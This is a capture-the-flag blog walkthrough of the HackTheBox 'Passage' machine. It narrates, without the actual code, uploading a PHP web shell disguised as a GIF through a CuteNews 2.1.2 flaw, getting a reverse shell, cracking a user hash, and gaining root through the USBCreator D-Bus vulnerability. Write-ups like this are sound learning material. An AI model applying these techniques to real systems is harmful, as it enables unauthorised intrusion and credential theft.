Feb 25, 2021
Passage — HackTheBox
This is a practical Walkthrough of “Passage” machine from HackTheBox. This machine is marked as medium level. Credit goes to ChefByzen for making this machine available to us and base points are 30 for this machine.
This walkthrough will be explanatory, because I learned a lot of new things from this machine. So, don’t mind my blabbering.
Passwords, hashes and Flags will be redacted to encourage you to solve those challenges on your own.
Enumeration
We will kick off this machine with enumerating using nmap.
Two ports are open, SSH and HTTP. Let’s visit homepage.
There’s a message that admin has implemented “fail2ban”, it’d ban two minute if we try to do/access more than it needed. So, we can’t run any automatic/bruteforce tools on target.
Do not forget to add the passage.htb to /etc/hosts file. The homepage source revealed that it’s using “CuteNews” management system for news. Its official page confirms that it’s last updated on 2018.
It’s version is 2.1.2 and there is a vulnerability exists in this version, where the attacker can infiltrate the server through the avatar upload process from the profile area. For this to work, we need to register and login.
From browse section we can upload php file with our one-liner. But, first we need to create a php file.
Content of php file with gif magic bytes to make believe that our file is a gif not any malicious one.
As you can see it’s showing it as GIF file. Let’s upload and intercept the packets in BurpSuite.
As you can see our php file is uploaded to a location on server and named it differently. To execute our php file we need to visit the above link.
We got the GIF bytes as result. Now let’s try with cmd.
It’s working as expected. Now let’s run a python one-liner to get a reverse shell. You can get it from here. Setup a netcat listener on kali and encode the one-liner to URL from BurpSuite.
Execute it and you’d get a reverse shell.
Aight, *Hacker Voice* we are in. If we check the home directory, then we’d see two users.
One of them has user.txt and other would help us to get root shell. Both directories are not a accessible to our current user (www-data). Let’s run LinPeas to get any possible privesc information.
Note: Even though you have access to shell still target would ban you from accessing excessive resources. It’d get stuck time to time.
We got couple things, to look out for PrivEsc. First let’s look into config file.
As you can see, it’s empty. Let’s look into the cdata directory for any information.
This directory has a lot of files, but out of all there’s a directory names “users”. If we list the contents, then we’d see a lot of php files some of them are in base64 strings.
If we read the lines file, then we’d get all the .php files information in one file.
Most of the content is encoded in base64. If we decode the below one then we’d get some juicy infomration.
As you can see, “paul” user’s information and there’s a hash of that user. Let’s find what hashing algorithm is that and crack it accordingly.
We got the password for user “Paul” lets login and get our user flag.
If we check the home directory of current user, then there’s no any messages/hints, this user can’t run sudo, and there’s nothing much from LinPeas too. But, in .ssh directory, I found something interesting.
It seems, both paul and nadav are using same ssh keys. Lets run ssh on “nadav” user.
We are privileged user now. Even though we have access to user shell but we don’t know the password to run sudo. After running LinPeas, I got this.
If we follow the link, then we’d end up in this blog post.
TL;DR
A vulnerability in the USBCreator D-Bus interface allows an attacker with access to a user in the sudoer group to bypass the password security policy imposed by the sudo program. The vulnerability allows an attacker to overwrite arbitrary files with arbitrary content, as root — without supplying a password. This trivially leads to elevated privileges, for instance, by overwriting the shadow file and setting a password for root.
So, we can either copy the root.txt to our current user home directory or we can copy the ssh private key.
Access the root using ssh private key and read the flag.
We got all the flags required to complete this machine.
Thank you for reading this blog. While attempting this challenge I learned so many things. This was unique target with unique vulnerability.
Reference
https://musyokaian.medium.com/cutenews-2-1-2-remote-code-execution-vulnerability-450f29673194
https://book.hacktricks.xyz/linux-unix/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation
https://unit42.paloaltonetworks.com/usbcreator-d-bus-privilege-escalation-in-ubuntu-desktop/
